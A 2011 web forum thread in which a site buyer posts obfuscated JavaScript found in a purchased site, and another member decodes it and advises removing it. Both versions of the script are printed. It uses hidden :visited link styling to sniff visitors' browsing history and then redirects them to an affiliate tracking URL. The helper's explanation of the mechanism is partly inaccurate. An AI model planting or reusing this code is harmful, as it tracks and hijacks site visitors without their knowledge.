1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

need help deciphering

Discussion in 'PHP & Perl' started by theWombat, Mar 12, 2011.

  1. theWombat

    theWombat Regular Member

    Joined:
    Oct 20, 2009
    Messages:
    359
    Likes Received:
    191
    Location:
    Back in the USSR
    Home Page:
    found this bit of code in a site i bought, can anyone tell me what the hell it is?

    Code:
    <script> 
    var _0xda61=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x69\x63\x6B\x65\x64\x66\x69\x72\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x64\x69\x67\x69\x74\x61\x6C\x70\x6F\x69\x6E\x74\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x69\x74\x65\x70\x6F\x69\x6E\x74\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x75\x6E\x64\x6F\x6D\x65\x64\x69\x61\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x78\x64\x69\x67\x69\x74\x61\x6C\x6D\x65\x64\x69\x61\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6E\x65\x76\x65\x72\x62\x6C\x75\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x6C\x69\x63\x6B\x62\x6F\x6F\x74\x68\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x70\x76\x70\x6C\x61\x79\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x70\x70\x76\x70\x6C\x61\x79\x62\x6F\x6F\x6B\x2E\x6E\x65\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x70\x76\x70\x6C\x61\x79\x62\x6F\x6F\x6B\x2E\x6E\x65\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x79\x64\x72\x61\x6E\x65\x74\x77\x6F\x72\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x69\x6E\x6E\x61\x63\x6C\x65\x64\x72\x65\x61\x6D\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x72\x74\x6E\x65\x72\x73\x2E\x70\x69\x6E\x6E\x61\x63\x6C\x65\x64\x72\x65\x61\x6D\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x61\x72\x74\x6E\x65\x72\x73\x2E\x70\x69\x6E\x6E\x61\x63\x6C\x65\x64\x72\x65\x61\x6D\x2E\x63\x6F\x6D\x2F\x6C\x6F\x67\x69\x6E\x2E\x70\x64\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x64\x73\x34\x64\x6F\x75\x67\x68\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x34\x64\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x65\x61\x64\x76\x74\x72\x61\x63\x6B\x65\x72\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x65\x61\x64\x76\x74\x72\x61\x63\x6B\x65\x72\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x72\x61\x66\x66\x69\x63\x76\x61\x6E\x63\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x74\x72\x61\x66\x66\x69\x63\x76\x61\x6E\x63\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x6C\x65\x61\x64\x69\x6D\x70\x61\x63\x74\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x6C\x65\x61\x64\x69\x6D\x70\x61\x63\x74\x2E\x63\x6F\x6D\x2F\x44\x65\x66\x61\x75\x6C\x74\x2E\x61\x73\x70\x78","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x65\x77\x61\x6E\x65\x74\x77\x6F\x72\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x65\x64\x69\x61\x74\x72\x75\x73\x74\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x6B\x6D\x67\x2E\x63\x6F\x6D\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x6F\x70\x65\x61\x63\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x2E\x6B\x69\x6E\x67\x74\x72\x6B\x2E\x63\x6F\x6D\x2F","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2E\x63\x6F\x70\x65\x61\x63\x2E\x63\x6F\x6D\x2F\x70\x61\x72\x74\x6E\x65\x72\x73\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x76\x65\x6E\x75\x65\x61\x64\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x72\x2E\x61\x64\x6F\x6E\x6E\x65\x74\x77\x6F\x72\x6B\x2E\x63\x6F\x6D\x2F\x61\x64\x6F\x6E\x6E\x65\x74\x77\x6F\x72\x6B\x2F\x61\x63\x63\x6F\x75\x6E\x74\x48\x6F\x6D\x65\x2E\x68\x74\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x72\x2E\x61\x64\x6F\x6E\x6E\x65\x74\x77\x6F\x72\x6B\x2E\x63\x6F\x6D\x2F\x61\x64\x6F\x6E\x6E\x65\x74\x77\x6F\x72\x6B\x2F\x6C\x6F\x67\x69\x6E\x2E\x68\x74\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x65\x64\x69\x61\x74\x72\x61\x66\x66\x69\x63\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2E\x65\x61\x67\x6C\x65\x77\x65\x62\x61\x73\x73\x65\x74\x73\x2E\x63\x6F\x6D\x2F\x48\x6F\x6D\x65\x2E\x61\x73\x70\x78","\x68\x74\x74\x70\x3A\x2F\x2F\x66\x75\x74\x75\x72\x65\x61\x64\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x75\x74\x75\x72\x65\x61\x64\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x75\x74\x75\x72\x65\x61\x64\x73\x2E\x63\x6F\x6D\x2F\x6C\x6F\x67\x69\x6E\x2E\x70\x68\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x70\x61\x66\x75\x65\x6C\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x63\x70\x61\x66\x75\x65\x6C\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x64\x73\x2E\x63\x70\x61\x66\x75\x65\x6C\x2E\x63\x6F\x6D\x2F\x70\x61\x72\x74\x6E\x65\x72\x73\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x69\x63\x6B\x79\x63\x61\x6B\x65\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6E\x69\x63\x6B\x79\x63\x61\x6B\x65\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x68\x6F\x65\x6D\x6F\x6E\x65\x79\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x68\x6F\x65\x6D\x6F\x6E\x65\x79\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x66\x66\x70\x6F\x72\x74\x61\x6C\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x66\x66\x70\x6F\x72\x74\x61\x6C\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x6A\x6F\x6E\x61\x74\x68\x61\x6E\x76\x6F\x6C\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x6F\x6E\x61\x74\x68\x61\x6E\x76\x6F\x6C\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x61\x6E\x66\x65\x72\x6E\x61\x6E\x64\x6F\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x69\x61\x6E\x66\x65\x72\x6E\x61\x6E\x64\x6F\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x79\x6C\x65\x72\x63\x72\x75\x7A\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x74\x79\x6C\x65\x72\x63\x72\x75\x7A\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x70\x63\x2D\x63\x6F\x61\x63\x68\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x70\x70\x63\x2D\x63\x6F\x61\x63\x68\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x61\x63\x6A\x6F\x68\x6E\x73\x6F\x6E\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x7A\x61\x63\x6A\x6F\x68\x6E\x73\x6F\x6E\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x62\x65\x72\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x75\x62\x65\x72\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x62\x72\x79\x6E\x2E\x6D\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x62\x72\x79\x6E\x2E\x6D\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x69\x6C\x69\x74\x72\x61\x63\x2E\x63\x6F\x6D\x2F\x43\x6C\x69\x63\x6B\x2E\x61\x73\x70\x78\x3F\x74\x69\x64\x3D\x41\x45\x45\x43\x35\x39\x34\x39\x39\x35\x45\x41\x44\x30\x32\x43\x31\x38\x38\x35\x42\x44\x39\x46\x38\x32\x37\x45\x31\x46\x38\x37\x33\x46\x42\x34\x30\x43\x41\x30\x45\x41\x46\x43\x34\x37\x37\x44\x26\x46\x69\x6C\x69\x41\x66\x66\x3D\x31\x37\x39\x38\x30\x26\x73\x69\x64\x3D\x63\x61\x66\x66\x73","\x3C\x73\x74\x79\x6C\x65\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x63\x73\x73\x22\x3E\x23\x6E\x69\x63\x6B\x65\x64\x20\x61\x3A\x6C\x69\x6E\x6B\x7B\x63\x6F\x6C\x6F\x72\x3A\x23\x66\x66\x66\x3B\x7D","\x77\x72\x69\x74\x65","\x23\x6E\x69\x63\x6B\x65\x64\x20\x61\x3A\x76\x69\x73\x69\x74\x65\x64\x7B\x68\x65\x69\x67\x68\x74\x3A\x31\x70\x78\x3B\x77\x69\x64\x74\x68\x3A\x31\x70\x78\x3B\x64\x69\x73\x70\x6C\x61\x79\x3A\x62\x6C\x6F\x63\x6B\x3B\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x64\x65\x6E\x3B\x6D\x61\x72\x67\x69\x6E\x3A\x31\x70\x78\x3B\x7D","\x23\x6E\x69\x63\x6B\x65\x64\x7B\x66\x6F\x6E\x74\x2D\x73\x69\x7A\x65\x3A\x31\x70\x78\x3B\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x64\x65\x6E\x3B\x68\x65\x69\x67\x68\x74\x3A\x31\x70\x78\x3B\x6D\x61\x72\x67\x69\x6E\x3A\x30\x3B\x70\x61\x64\x64\x69\x6E\x67\x3A\x30\x3B\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x6E\x69\x63\x6B\x65\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x61","\x68\x72\x65\x66","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x6F\x66\x66\x73\x65\x74\x48\x65\x69\x67\x68\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];var searchurls=[_0xda61[0],_0xda61[1],_0xda61[2],_0xda61[1],_0xda61[3],_0xda61[4],_0xda61[5],_0xda61[6],_0xda61[7],_0xda61[8],_0xda61[9],_0xda61[10],_0xda61[11],_0xda61[12],_0xda61[13],_0xda61[14],_0xda61[15],_0xda61[16],_0xda61[17],_0xda61[18],_0xda61[19],_0xda61[20],_0xda61[21],_0xda61[22],_0xda61[23],_0xda61[24],_0xda61[25],_0xda61[26],_0xda61[27],_0xda61[28],_0xda61[29],_0xda61[30],_0xda61[31],_0xda61[32],_0xda61[33],_0xda61[34],_0xda61[35],_0xda61[36],_0xda61[37],_0xda61[38],_0xda61[39],_0xda61[40],_0xda61[41],_0xda61[42],_0xda61[43],_0xda61[44],_0xda61[45],_0xda61[46],_0xda61[47],_0xda61[48],_0xda61[49],_0xda61[50],_0xda61[51],_0xda61[52],_0xda61[53],_0xda61[54],_0xda61[55],_0xda61[56],_0xda61[57],_0xda61[58]];var cloakurl=_0xda61[59];document[_0xda61[61]](_0xda61[60]);document[_0xda61[61]](_0xda61[62]);document[_0xda61[61]](_0xda61[63]);var c=document[_0xda61[65]](_0xda61[64]);c[_0xda61[66]]=_0xda61[67];document[_0xda61[69]][_0xda61[68]](c);for(i in searchurls){var temp=document[_0xda61[65]](_0xda61[70]);temp[_0xda61[71]]=searchurls[i];temp[_0xda61[72]]=searchurls[i];c[_0xda61[68]](temp);if(temp[_0xda61[73]]==1){window[_0xda61[74]]=cloakurl;} ;} ;
    </script>
     
  2. crazyflx

    crazyflx Elite Member

    Joined:
    Nov 9, 2009
    Messages:
    1,674
    Likes Received:
    4,825
    Location:
    http://CRAZYFLX.COM
    Home Page:
    That my friend, is obfuscated javascript coding. Obfuscated javascript just means taking regular javascript code, and rendering it completely unreadable via a "quick and dirty" encryption...the bad part about obfuscated javascript code, is that it is easily decrypted.

    Here is a site that will give you an example of obfuscating javascript code: http://www.javascriptobfuscator.com/

    The obfuscated code you posted, actually says the following:


    Code:
    var searchurls = ['http://www.wickedfire.com', 'http://www.digitalpoint.com', 'http://www.sitepoint.com', 'http://www.digitalpoint.com', 'http://www.mundomedia.com', 'http://www.cxdigitalmedia.com', 'http://www.neverblue.com', 'http://www.clickbooth.com', 'http://www.ppvplaybook.com', 'http://ppvplaybook.net', 'http://www.ppvplaybook.net', 'http://www.hydranetwork.com', 'http://www.pinnacledream.com', 'http://partners.pinnacledream.com', 'https://partners.pinnacledream.com/login.pdm', 'http://www.ads4dough.com', 'http://www.a4d.com', 'http://eadvtracker.com', 'http://www.eadvtracker.com', 'http://www.trafficvance.com', 'http://trafficvance.com', 'https://www.leadimpact.com', 'https://www.leadimpact.com/Default.aspx', 'http://www.ewanetwork.com', 'http://www.mediatrust.com', 'http://www.akmg.com/', 'http://www.copeac.com', 'http://affiliate.kingtrk.com/', 'https://affiliates.copeac.com/partners/', 'http://revenueads.com', 'http://advertiser.adonnetwork.com/adonnetwork/accountHome.htm', 'http://advertiser.adonnetwork.com/adonnetwork/login.htm', 'http://www.mediatraffic.com', 'http://affiliates.eaglewebassets.com/Home.aspx', 'http://futureads.com', 'http://www.futureads.com', 'http://www.futureads.com/login.php', 'http://www.cpafuel.com', 'http://cpafuel.com', 'https://ads.cpafuel.com/partners/', 'http://nickycakes.com', 'http://www.nickycakes.com', 'http://www.shoemoney.com', 'http://shoemoney.com', 'http://affportal.com', 'http://www.affportal.com', 'http://jonathanvolk.com', 'http://www.jonathanvolk.com', 'http://ianfernando.com', 'http://www.ianfernando.com', 'http://www.tylercruz.com', 'http://tylercruz.com', 'http://www.ppc-coach.com', 'http://ppc-coach.com', 'http://zacjohnson.com', 'http://www.zacjohnson.com', 'http://uberaffiliate.com', 'http://www.uberaffiliate.com', 'http://bryn.me', 'http://www.bryn.me'];
    var cloakurl = 'http://www.filitrac.com/Click.aspx?tid=AEEC594995EAD02C1885BD9F827E1F873FB40CA0EAFC477D&FiliAff=17980&sid=caffs';
    document['write']('<style type="text/css">#nicked a:link{color:#fff;}');
    document['write']('#nicked a:visited{height:1px;width:1px;display:block;overflow:hidden;margin:1px;}');
    document['write']('#nicked{font-size:1px;overflow:hidden;height:1px;margin:0;padding:0;}</style>');
    var c = document['createElement']('div');
    c['id'] = 'nicked';
    document['body']['appendChild'](c);
    for (i in searchurls) {
        var temp = document['createElement']('a');
        temp['href'] = searchurls[i];
        temp['innerHTML'] = searchurls[i];
        c['appendChild'](temp);
        if (temp['offsetHeight'] == 1) {
            window['location'] = cloakurl;
        };
    };
     
    • Thanks Thanks x 1
    Last edited: Mar 12, 2011
  3. crazyflx

    crazyflx Elite Member

    Joined:
    Nov 9, 2009
    Messages:
    1,674
    Likes Received:
    4,825
    Location:
    http://CRAZYFLX.COM
    Home Page:
    After chatting with some people who know a little more about javascript than I do (thanks cheesecheese & CHAFO), it seems as though anytime you link to one of the sites mentioned in that first line of unobfuscated code, it is going to actually link to their affiliate link (which for me, goes to a free credit report offer).

    Not only that, but if you were to mouseover the link or even view it in the source code, it is going to appear as though it links to the appropriate location.

    I'm going to take a guess, and say you purchased some sort of internet marketing site/blog.
     
  4. theWombat

    theWombat Regular Member

    Joined:
    Oct 20, 2009
    Messages:
    359
    Likes Received:
    191
    Location:
    Back in the USSR
    Home Page:
    so essentially they're trying to jack all my clicks (ppv lander)
     
  5. crazyflx

    crazyflx Elite Member

    Joined:
    Nov 9, 2009
    Messages:
    1,674
    Likes Received:
    4,825
    Location:
    http://CRAZYFLX.COM
    Home Page:
    Basically, yes.

    Remove the code and you should be alright, but I'd keep a keen eye out for anything else...and please, wherever you bought that at, publicly tear the guy apart ;)